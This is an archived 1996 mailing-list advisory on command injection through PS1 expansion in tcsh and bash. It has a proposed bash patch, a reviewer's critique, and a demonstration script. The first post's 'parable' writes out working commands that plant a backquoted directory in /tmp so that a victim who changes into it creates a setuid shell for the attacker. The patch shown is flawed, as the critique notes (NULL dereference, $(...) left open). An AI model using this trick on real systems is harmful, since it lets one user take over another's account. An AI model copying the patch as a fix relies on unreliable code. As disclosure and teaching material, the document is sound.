Vulnerability in expansion of PS1 in bash & tcsh
From: bethery () info enserb u-bordeaux fr (BETHERY Olivier)
Date: Thu, 19 Sep 1996 20:52:26 +0200

From: test (butafuco () MC NET)
Date: Fri, 13 Sep 1996 09:03:00 -0500

A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
out with BSDI anyway) that allows the execution of arbitrary commands
when changing into directories whose names are enclosed in backticks.  The
problem might also prove to be quite bad for tcsh scripts that find
themselves changing into directories on the fly.

Here is probably one of the dumbest methods possible that could be used to
exploit this weakness.

----------------------------Cut to Bad guy--------------------------------

jim% whoami
Evol bad guy
jim% mkdir /tmp/\`source\ .WaReZ\`
jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ
jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ
jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ
jim% chmod +x /tmp/*W*/.WaReZ

---------------------------Cut to unsuspecting foo------------------------

jim% whoami
Unsuspecting foo
jim% echo $SHELL
jim% I just like to check that sometimes.
jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff
jim% cd /tmp
jim% ls

`source .WaReZ`

jim% OH BOY!!! the jack pot!
jim% cd *WaReZ*
jim% ls

jim% oh, oh well maybe I'll check later...
jim% cd $HOME

----------------------------Cut to More Bad guy--------------------------

jim% ls -a /tmp/*W*/


jim% /tmp/*W*/.24753
unsuspecting foo
$ hah.
---------------------------End Unix Parable-------------------------------

The backquotes trigger the expansion procedure, so the expression
between the quotes is evaluated. This expansion runs whenever the
PS1 variable needs to be evaluated, for example after a cd command.
So if the string between the quotes is a command line, that line is run
with the UID of the user who is doing the cd command.

A first fix for bash (not tested with tcsh):
Do not use PS1 and do not include . in your path.

Second available fix for bash (not tested with tcsh):
(First release, can be improved.)

*** bash-1.14.7/parse.y Mon Aug 26 17:15:55 1996
--- bugfixed-bash/bash-1.14.7/parse.y   Thu Sep 19 16:20:58 1996
*** 2719,2727 ****
  #define EFFICIENT
  #ifdef EFFICIENT
                char *polite_directory_format (),
                temp = get_string_value ("PWD");
                if (!temp)
                  getwd (t_string);
--- 2719,2733 ----
  #define EFFICIENT
  #ifdef EFFICIENT
                char *polite_directory_format (),
!               char *mutmp;
                temp = get_string_value ("PWD");
!       /* BUGFIX -mu */
!               mutmp=temp;
!               while (*mutmp != '\0') {
!                 if (*mutmp == '`')
!                   *mutmp='%';
!                 mutmp++;
!               }
                if (!temp)
                  getwd (t_string);
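
Review bot: the sanitizing loop runs before the `if (!temp)` check that follows it, so with PWD unset (get_string_value returning NULL) `mutmp=temp; while (*mutmp != '\0')` dereferences NULL and the shell crashes; move the loop under the null check. The loop also writes into the buffer get_string_value returned, i.e. the shell's own copy of $PWD, so the variable itself is altered (every backquote becomes `%`) rather than only the text shown in the prompt; sanitize a copy instead. Two paths are still left open by this hunk: the `getwd (t_string)` fallback taken when PWD is unset is never filtered, and only the backquote is rewritten, so the `$(...)` form of command substitution in a directory name reaches the prompt untouched.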

email: bethery () info enserb u-bordeaux fr
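
The following shell script is an added illustration of the mechanism discussed in this thread; it is not part of either post and is not the bash patch above. It simulates a shell that substitutes the working directory for \w in a prompt template and then subjects the result to command substitution, once with the raw directory name and once with the backquote, dollar and backslash characters escaped first. The directory name, the marker file path, the template and all function names are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the original posts. Models prompt expansion:
# the directory name is substituted into the prompt template and the result
# is then command-substituted, which is what let a directory named
# `source .WaReZ` run code as the user who cd'd into it.

MARKER="${TMPDIR:-/tmp}/ps1_demo_marker_$$"   # constructed path for the demo

# Replace the first \w in the template ($1) with the directory name ($2).
substitute_w() {
    template=$1
    dir=$2
    printf '%s' "${template%%\\w*}${dir}${template#*\\w}"
}

# Vulnerable behaviour: the substituted prompt is evaluated once more, so
# backquotes and $(...) inside the directory name are executed.
expand_prompt_unsafe() {
    prompt=$(substitute_w "$1" "$2")
    eval "printf '%s' \"$prompt\""
}

# Escape the characters that command substitution and parameter expansion
# act on (backslash, backquote, dollar) so the name survives re-evaluation
# as literal text.
escape_for_prompt() {
    printf '%s' "$1" | sed 's/[\\`$]/\\&/g'
}

# Hardened behaviour: escape the name before it enters the prompt string.
expand_prompt_safe() {
    prompt=$(substitute_w "$1" "$(escape_for_prompt "$2")")
    eval "printf '%s' \"$prompt\""
}

# Prints 1 if the injected command ran (marker file exists), else 0.
marker_created() {
    if [ -e "$MARKER" ]; then echo 1; else echo 0; fi
}

# Constructed attacker-controlled directory name, in the spirit of the
# /tmp entry from the post: a command wrapped in backquotes.
EVIL_DIR="\`touch $MARKER\`"

# Demo run: each expansion starts with no marker file present.
rm -f "$MARKER"
printf 'unsafe prompt: %s\n' "$(expand_prompt_unsafe '[\w]$ ' "$EVIL_DIR")"
printf 'injected command ran: %s\n' "$(marker_created)"
rm -f "$MARKER"
printf 'safe prompt:   %s\n' "$(expand_prompt_safe '[\w]$ ' "$EVIL_DIR")"
printf 'injected command ran: %s\n' "$(marker_created)"
rm -f "$MARKER"
```

Run it with sh: the unsafe expansion creates the marker file and shows an empty name in the prompt, while the escaped expansion prints the backquoted name literally and runs nothing. Escaping every expansion character before the name enters the prompt string (or not re-expanding substituted text at all) closes both the backquote and the $(...) variants; rewriting only the backquote, as the bash patch does, leaves the latter open.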
